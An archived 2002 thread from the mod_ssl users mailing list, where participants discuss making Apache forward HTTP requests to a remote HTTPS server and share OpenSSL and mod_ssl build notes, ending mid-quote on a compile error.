Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA17723; Thu, 25 Jul 2002 00:32:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id AAA17639; Thu, 25 Jul 2002 00:31:05 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 285D125175; Wed, 24 Jul 2002 14:29:37 -0700 (PDT)
Date: Wed, 24 Jul 2002 14:29:37 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <20020724212937.GA2183@rawbyte.com>
References: <1027542557.3d3f0e1dadce1@wd21.dyndns.org> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> yes, that is correct.  I meant http to https.  So, there is no way to do
> this with existing mods?  I have to use something else?  Java or Python
> program?  Anyone already have anything?

You can already do it with Apache 2, and I am pretty sure you can do it with
Apache 1.3 too. The directives are just not documented, I am working on a
patch for the docs. But you are able to do

SSLProxyEngine on
ProxyPass / https://some.host.com

And you can also use other SSLProxy* directives like SSLProxyVerify, etc.

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 00:45:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA18887; Thu, 25 Jul 2002 00:44:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id AAA18846; Thu, 25 Jul 2002 00:43:58 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id <3M9MMCQQ>; Wed, 24 Jul 2002 14:58:35 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D20F0@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: http to https forward
Date: Wed, 24 Jul 2002 14:58:30 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This can be done with proxypass as long as the urls are relative. If urls
are imbedded in javascript, I have had to write a perl module to 
re-write urls.

David Marshall

-----Original Message-----
From: David Iungerich [mailto:david@iungerich.com]
Sent: Wednesday, July 24, 2002 12:07 PM
To: modssl-users@modssl.org
Subject: http to https forward
Importance: High


I need to implement Apache as an https to http forwarder.  I belive I need
to use
ProxyPass or Redirect, but am having difficulty figuring out the correct
configuration.
My scenario is as follows:

I have an appserver that needs to POST http requests to another company's
appserver.  Unfortunately, the particular product we are using has issues
being able to send https, and the other company requires it.  They have
issued us certificates to talk to them.  I need to be able to send http POST
reqests to an Apache webserver, have it encrypt the request with the other
company's cert, and then pass the POST onto that company's server via https.
No browser involved.  Eventually, I will need to do the same thing in
reverse, but initially I just need to be able to send in this direction.
Can you tell me what all specific entries needed in the conf file to
implement
this.  Again, our server http to Apache, then encrypt using cert we were
given, and Apache to other
company's server via https.

Apache Vesion is currently 1.3.23 - will update for security issues once we
can implement this scenario.
Running on Suse Linux 8.0

Thanks,
David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 00:47:59 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19027; Thu, 25 Jul 2002 00:46:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uxe450b.kwe.com id AAA18944; Thu, 25 Jul 2002 00:45:36 +0200 (MET DST)
Received: from diungerich ([10.0.2.83]) by uxe450b.kwe.com
          (Netscape Messaging Server 3.6)  with SMTP id AAA49A6
          for ; Wed, 24 Jul 2002 22:44:19 +0000
From: "David Iungerich" 
To: 
Subject: RE: http to https forward
Date: Wed, 24 Jul 2002 17:45:15 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
In-Reply-To: <20020724212937.GA2183@rawbyte.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Iungerich" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Daniel.  What all is needed as adjustments to my conf file?  As I
understood it, there  was an issue with Apach taking an http POST reqest and
encrypting it with a given cert, then sending it along via https.  If you
could tell me exactly what I need version-wise and what to add/change in a
standard conf file, I'd greatly appreciate it.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
Sent: Wednesday, July 24, 2002 4:30 PM
To: modssl-users@modssl.org
Subject: Re: http to https forward



> yes, that is correct.  I meant http to https.  So, there is no way to do
> this with existing mods?  I have to use something else?  Java or Python
> program?  Anyone already have anything?

You can already do it with Apache 2, and I am pretty sure you can do it with
Apache 1.3 too. The directives are just not documented, I am working on a
patch for the docs. But you are able to do

SSLProxyEngine on
ProxyPass / https://some.host.com

And you can also use other SSLProxy* directives like SSLProxyVerify, etc.

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 00:59:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19693; Thu, 25 Jul 2002 00:58:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id AAA19626; Thu, 25 Jul 2002 00:58:04 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id F285025188; Wed, 24 Jul 2002 15:48:53 -0700 (PDT)
Date: Wed, 24 Jul 2002 15:48:53 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <20020724224853.GA2356@rawbyte.com>
References: <20020724212937.GA2183@rawbyte.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jul 24, 2002 at 05:45:15PM -0500, David Iungerich wrote:
> Thanks Daniel.  What all is needed as adjustments to my conf file?  As I
> understood it, there  was an issue with Apach taking an http POST reqest and
> encrypting it with a given cert, then sending it along via https.  If you
> could tell me exactly what I need version-wise and what to add/change in a
> standard conf file, I'd greatly appreciate it.

I am not sure I understand what you mean with "encrypting it with a given
cert". I am guessing it means that your client must present a specific
client certificate to the remote server. This SSL functionality was present
in mod_ssl versions for 1.3 if you compiled with SSL_EXPERIMENTAL flag, but
was not working very well.
Apache 2.0 includes robust support for that functionality (thanks to Doug
MacEachern of mod_perl fame) and I recommend you use that. The directive you
want is SSLProxyMachineCertificateFile, for specifying the client
certificate(s) to present to the remote server. It is not documented
currently on the Apache project, but take a look at :
http://www.covalent.net/support/docs/faststart/2.0.0/userguide/html/sslconfigure.php#1138492

Hope it helps

Daniel


> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Daniel Lopez
> Sent: Wednesday, July 24, 2002 4:30 PM
> To: modssl-users@modssl.org
> Subject: Re: http to https forward
> 
> 
> 
> > yes, that is correct.  I meant http to https.  So, there is no way to do
> > this with existing mods?  I have to use something else?  Java or Python
> > program?  Anyone already have anything?
> 
> You can already do it with Apache 2, and I am pretty sure you can do it with
> Apache 1.3 too. The directives are just not documented, I am working on a
> patch for the docs. But you are able to do
> 
> SSLProxyEngine on
> ProxyPass / https://some.host.com
> 
> And you can also use other SSLProxy* directives like SSLProxyVerify, etc.
> 
> Daniel
> 
> --
> Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 01:00:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19698; Thu, 25 Jul 2002 00:59:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from battersbox.nameconnector.com id AAA19632; Thu, 25 Jul 2002 00:58:12 +0200 (MET DST)
Received: from MAILBOX.nameconnector.com ([10.1.64.1]) by battersbox.nameconnector.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 24 Jul 2002 17:35:57 -0400
Received: by MAILBOX.nameconnector.com with Internet Mail Service (5.5.2653.19)
	id <3ZAG96YS>; Wed, 24 Jul 2002 17:35:57 -0400
Message-ID: <61957B071FF421419E567A28A45C7FE514A5FA@MAILBOX.nameconnector.com>
From: Geoffrey Talvola 
To: "'modssl-users@modssl.org'" 
Subject: RE: http to https forward
Date: Wed, 24 Jul 2002 17:35:56 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
X-OriginalArrivalTime: 24 Jul 2002 21:35:57.0370 (UTC) FILETIME=[18AA91A0:01C2335A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoffrey Talvola 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Stunnel can transform http requests into https requests.

http://www.stunnel.org/

- Geoff

> -----Original Message-----
> From: David Iungerich [mailto:david@iungerich.com]
> Sent: Wednesday, July 24, 2002 4:53 PM
> To: modssl-users@modssl.org
> Subject: RE: http to https forward
> 
> 
> yes, that is correct.  I meant http to https.  So, there is 
> no way to do
> this with existing mods?  I have to use something else?  Java 
> or Python
> program?  Anyone already have anything?
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Michael Pacey
> Sent: Wednesday, July 24, 2002 3:29 PM
> To: modssl-users@modssl.org
> Subject: Re: http to https forward
> 
> 
> Quoting David Iungerich :
> 
> > I need to implement Apache as an https to http forwarder.  
> I belive I
> > need
> > to use
> > ProxyPass or Redirect, but am having difficulty figuring out the
> > correct
> > configuration.
> 
> 
> Just to clarify, I think you mean http to https forwarder, as in your
> subject;
> Apache forwards https to http without any problems.
> 
> But for http to https, your problem isn't configuration; 
> Apache+mod_ssl
> doesn't
> have the code for initiation of HTTPS connections. I've looked!
> 
> Everybody told me it wouldn't work, I didn't believe them, I 
> couldn't make
> it
> work, I read the code, it's not there!
> 
> The only product I know of that might be able to do this is 
> IBM EdgeServer,
> and
> possibly Netscape. Have to say I don't like EdgeServer and I have no
> experience
> of Netscape.
> 
> Is there no-one around who'd like to code this? There are 
> quite a few people
> who
> want to use Apache to initiate HTTPS connections. I don't 
> have the time /
> coding
> skills.
> --
> Web: http://sydb.dyndns.org
> ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
> IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 01:06:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA20109; Thu, 25 Jul 2002 01:05:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id BAA20085; Thu, 25 Jul 2002 01:04:30 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 0325024E91; Wed, 24 Jul 2002 13:49:14 -0700 (PDT)
Date: Wed, 24 Jul 2002 13:49:14 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <20020724204914.GA1993@rawbyte.com>
References:  <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> Quoting David Iungerich :
> 
> > I need to implement Apache as an https to http forwarder.  I belive I
> > need
> > to use
> > ProxyPass or Redirect, but am having difficulty figuring out the
> > correct
> > configuration.
> 
> 
> Just to clarify, I think you mean http to https forwarder, as in your subject;
> Apache forwards https to http without any problems.
> 
> But for http to https, your problem isn't configuration; Apache+mod_ssl doesn't
> have the code for initiation of HTTPS connections. I've looked!
> 
> Everybody told me it wouldn't work, I didn't believe them, I couldn't make it
> work, I read the code, it's not there!
>
> The only product I know of that might be able to do this is IBM EdgeServer, and
> possibly Netscape. Have to say I don't like EdgeServer and I have no experience
> of Netscape.
> 
> Is there no-one around who'd like to code this? There are quite a few people who
> want to use Apache to initiate HTTPS connections. I don't have the time / coding
> skills.

Um, no, you can already do it

SSLProxyEngine on
ProxyPass / https://some.other.host

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 01:23:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA21610; Thu, 25 Jul 2002 01:22:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blueyonder.co.uk id BAA21569; Thu, 25 Jul 2002 01:21:50 +0200 (MET DST)
Received: from pcow058m.blueyonder.co.uk ([127.0.0.1]) by blueyonder.co.uk  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Wed, 24 Jul 2002 22:41:35 +0100
Received: from carlos.wd21.co.uk (unverified [80.195.5.12]) by pcow058m.blueyonder.co.uk
 (Content Technologies SMTPRS 4.2.9) with ESMTP id  for ;
 Wed, 24 Jul 2002 22:35:20 +0100
Received: from www-data by carlos.wd21.co.uk with local (Exim 3.35 #1 (Debian))
	id 17XTsN-00046X-00
	for ; Wed, 24 Jul 2002 22:40:55 +0100
To: modssl-users@modssl.org
Subject: RE: http to https forward
Message-ID: <1027546855.3d3f1ee7e383f@wd21.dyndns.org>
Date: Wed, 24 Jul 2002 22:40:55 +0100 (BST)
From: Michael Pacey 
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: IMP/PHP IMAP webmail program 2.2.6
X-Originating-IP: 192.168.0.11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting David Iungerich :

> yes, that is correct.  I meant http to https.  So, there is no way to
> do
> this with existing mods?  I have to use something else?  Java or
> Python
> program?  Anyone already have anything?
> 

I couldn't find anything to do this besides the two proprietary programs I
mentioned before. My impression is this is a big hole in the open-source
toolkit, and proprietary software is going to fill it if someone more capable
than me doesn't fix things...

I see this sort of thing being a requirement for more and more big companies who
have established functional ecommerce infrastructures but need to start worrying
about security for all sorts of reasons including regulatory requirements
(especially secure comms between internal networks and DMZ). I'm not saying
there's any law requiring specifically this but big financial companies are
legally bound to protect data and they like to cover their bottoms.

I searched Freshmeat and Sourceforge. I found things that you can wrap http
servers in to make them look like https servers to the outside world but that is
the opposite of what you (and I) want to achieve.


--
Web: http://sydb.dyndns.org
ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 01:37:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA22716; Thu, 25 Jul 2002 01:36:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id BAA22469; Thu, 25 Jul 2002 01:32:13 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 92EE325186; Wed, 24 Jul 2002 16:23:05 -0700 (PDT)
Date: Wed, 24 Jul 2002 16:23:05 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <20020724232305.GA2502@rawbyte.com>
References:  <1027546855.3d3f1ee7e383f@wd21.dyndns.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1027546855.3d3f1ee7e383f@wd21.dyndns.org>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jul 24, 2002 at 10:40:55PM +0100, Michael Pacey wrote:
> Quoting David Iungerich :
> 
> > yes, that is correct.  I meant http to https.  So, there is no way to
> > do
> > this with existing mods?  I have to use something else?  Java or
> > Python
> > program?  Anyone already have anything?
> > 
> 
> I couldn't find anything to do this besides the two proprietary programs I
> mentioned before. My impression is this is a big hole in the open-source
> toolkit, and proprietary software is going to fill it if someone more capable
> than me doesn't fix things...

Come on... his is the 4th mail I send in the last couple hours mentioning that this
capability exists already in Apache 1.3 and, improved and more robust, in
Apache 2.0 They are just not documented, see my other emails for links and
example.  I am preparing a patch to the Apache documentation that includes
them. As other people mentioned, you can also use stunnel or similar
programs to set SSL tunneling (I have used it successfully in the past with
HTTP and POP3)


> I see this sort of thing being a requirement for more and more big companies who
> have established functional ecommerce infrastructures but need to start worrying
> about security for all sorts of reasons including regulatory requirements
> (especially secure comms between internal networks and DMZ). I'm not saying
> there's any law requiring specifically this but big financial companies are
> legally bound to protect data and they like to cover their bottoms.
> 
> I searched Freshmeat and Sourceforge. I found things that you can wrap http
> servers in to make them look like https servers to the outside world but that is
> the opposite of what you (and I) want to achieve.
> 
> 
> --
> Web: http://sydb.dyndns.org
> ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
> IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 01:45:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA23314; Thu, 25 Jul 2002 01:44:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla1.xs4all.nl id BAA23281; Thu, 25 Jul 2002 01:44:10 +0200 (MET DST)
Received: from xerxes (213-84-222-81.adsl.xs4all.nl [213.84.222.81])
	by smtpzilla1.xs4all.nl (8.12.0/8.12.0) with SMTP id g6OL9xm4070830
	for ; Wed, 24 Jul 2002 23:10:05 +0200 (CEST)
Message-ID: <002001c23356$84fecb90$0501a8c0@xerxes>
From: "M.E. Post" 
To: 
References:  <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
Subject: Re: http to https forward
Date: Wed, 24 Jul 2002 23:10:15 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Disposition-Notification-To: "M.E. Post" 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "M.E. Post" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

With the risk of booing and hissing but Microsoft ISA Server could do this
as well. It's capable of doing SSL Bridging, i.e. a full SSL proxy. It could
also be configured to have an HTTP session to the proxy and a HTTPS session
to the target platform.

Have a look at http://www.microsoft.com/isaserver and
http://www.isaserver.org/pages/articles.asp?art=157

hth

Meint



----- Original Message -----
From: "Michael Pacey" 
To: 
Sent: Wednesday, July 24, 2002 10:29 PM
Subject: Re: http to https forward


> Quoting David Iungerich :
>
> > I need to implement Apache as an https to http forwarder.  I belive I
> > need
> > to use
> > ProxyPass or Redirect, but am having difficulty figuring out the
> > correct
> > configuration.
>
>
> Just to clarify, I think you mean http to https forwarder, as in your
subject;
> Apache forwards https to http without any problems.
>
> But for http to https, your problem isn't configuration; Apache+mod_ssl
doesn't
> have the code for initiation of HTTPS connections. I've looked!
>
> Everybody told me it wouldn't work, I didn't believe them, I couldn't make
it
> work, I read the code, it's not there!
>
> The only product I know of that might be able to do this is IBM
EdgeServer, and
> possibly Netscape. Have to say I don't like EdgeServer and I have no
experience
> of Netscape.
>
> Is there no-one around who'd like to code this? There are quite a few
people who
> want to use Apache to initiate HTTPS connections. I don't have the time /
coding
> skills.
> --
> Web: http://sydb.dyndns.org
> ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
> IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 08:56:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA20829; Thu, 25 Jul 2002 08:55:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA20791; Thu, 25 Jul 2002 08:54:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9F6B34CE731; Thu, 25 Jul 2002 08:54:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0029428698; Thu, 25 Jul 2002 07:15:03 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from argyle.richmond.edu id VAA01181; Wed, 24 Jul 2002 21:51:15 +0200 (MET DST)
Received: from urmail-ag.richmond.edu (urmail-ag.richmond.edu [141.166.183.2])
	by argyle.richmond.edu (8.11.6/8.11.6) with ESMTP id g6OJl8e20714;
	Wed, 24 Jul 2002 15:47:08 -0400
Received: by urmail-ag.richmond.edu with Internet Mail Service (5.5.2653.19)
	id <3YZKNXWK>; Wed, 24 Jul 2002 15:47:08 -0400
Message-ID: 
From: "Carter, Coates" 
To: "'modssl-users@modssl.org'" 
Cc: "'abdel.ramli@mpsa.com'" 
Subject: =?iso-8859-1?Q?RE=3A_R=E9f=2E_=3A_RE=3A_Problem_with_ssl?=
Date: Wed, 24 Jul 2002 15:47:06 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA01190
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Carter, Coates" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Abdel,

What is the error message?  You wrote that the error was on line 76 of
mod_ssl.c, but I don't believe you mentioned the error message itself.  I've
just installed mod_ssl on apache on RedHat 7.2, all the same versions as
you.  I didn't have any errors or problems.  I chose to use the latest
openssl, which added a few more lines of work form me.  I've included for
you my notes from my installation.  Good luck.

Coates Carter
University of Richmond

#OPENSSL- REMOVE OLD RPM AND INSTALL LATEST TARBALL
rpm -e --repackage --nodeps openssl
cd /usr/local/src
gzip -dc openssl-0.9.6d.tar.gz |tar xvf -
cd /usr/local/src/openssl-0.9.6d
more INSTALL
./config shared
make
make test
make install
mv /usr/lib/libssl.so /usr/lib/libssl.so.old
mv /usr/lib/libcrypto.so /usr/lib/libcrypto.so.old
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 /usr/lib/libssl.so
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 /usr/lib/libssl.so.2
ln -s /usr/local/ssl/lib/libssl.so.0.9.6 libssl.so.0.9.6
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 /usr/lib/libcrypto.so
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 /usr/lib/libcrypto.so.2
ln -s /usr/local/ssl/lib/libcrypto.so.0.9.6 libcrypto.so.0.9.6
ln -s /usr/local/ssl/bin/openssl /usr/bin/openssl

#MM- BUILD THE SOURCE (www.engelschall.com/sw/mm)
cd /usr/local/src
gzip -dc mm-1.1.3.tar.gz|tar xvf -
cd /mm-1.1.3
./configure
make

#MOD_SSL- INSTALL NEW PATCH TO APACHE SOURCE
cd /usr/local/src
gzip -dc apache_1.3.26.tar.gz|tar xvf -
gzip -dc mod_ssl-2.8.10-1.3.26.tar.gz |tar xvf -
cd mod_ssl-2.8.10-1.3.26
./configure --with-apache=/usr/local/src/apache_1.3.26

#APACHE- INSTALL NEW TARBALL
cd /usr/local/src/apache_1.3.26
SSL_BASE=SYSTEM; EAPI_MM=../mm-1.1.3
./configure --prefix=/usr/local/apache --enable-module=ssl
--enable-shared=ssl
make
tar cvf /usr/local/apache.020724.tar /usr/local/apache
/usr/local/apache/bin/apachectl stop
#NOTE: INSTALL SSL CERTIFICATE AND KEY NOW, IF NOT ALREADY THERE
make install
/usr/local/apache/bin/apachectl startssl
#......THAT'S ALL IT TAKES......





-----Original Message-----
From: abdel.ramli@mpsa.com [mailto:abdel.ramli@mpsa.com]
Sent: Wednesday, July 24, 2002 3:17 AM
To: Frederic DONNAT
Subject: Réf. : RE: Problem with ssl



Hi Fred,
That's exactly what I meant by patched (as we may consider that mod_ssl is
not more than a patch applied to Apache source to modify it.

I just keep getting that error.
Please, help if you can.

Thanx





 

                    "Frederic DONNAT"

                    

                    encod.com>               cc :

                                             Objet : RE: Problem with ssl

                    23/07/2002 18:45

 

 







Hi Abdel


What do you mean by "patched"?

The classic way is :
[root]# cd mod_ssl-2.8.10-1.3.26
[root]# ./configure --prefix=/path_where_to_install_apache \
--with-apache=/path_to_apache_src --with-ssl=/path_to_openssl_src
[root]# cd /path_to_apache_src
[root]# make
[root]# make install

That's for a dynamic build.

Type the following command line before for a static one:
export LDFLAGS="-ldl"

Be sure to have the rigth openssl installed.

Hope it will help
Fred

-----Original Message-----
From:   abdel.ramli@mpsa.com [mailto:abdel.ramli@mpsa.com]
Sent:   Tue 07/23/2002 5:06 PM
To:     modssl-users@modssl.org
Cc:     owner-modssl-users@modssl.org
Subject:        Problem with ssl


*Hi all

I'm trying to get mod_ssl work with Apache on RedHat 7.2, with Apache
1.3.26 & mod_ssl-2.8.10-1.3.26


I just keep getting an error on line 76 of the mod_ssl.c while compiling
apache (patched with mod_ssl)

which is :

----------------------------------------------------------------------------
----------------------
 *  identify the module to SCCS `what' and RCS `ident' commands
 */
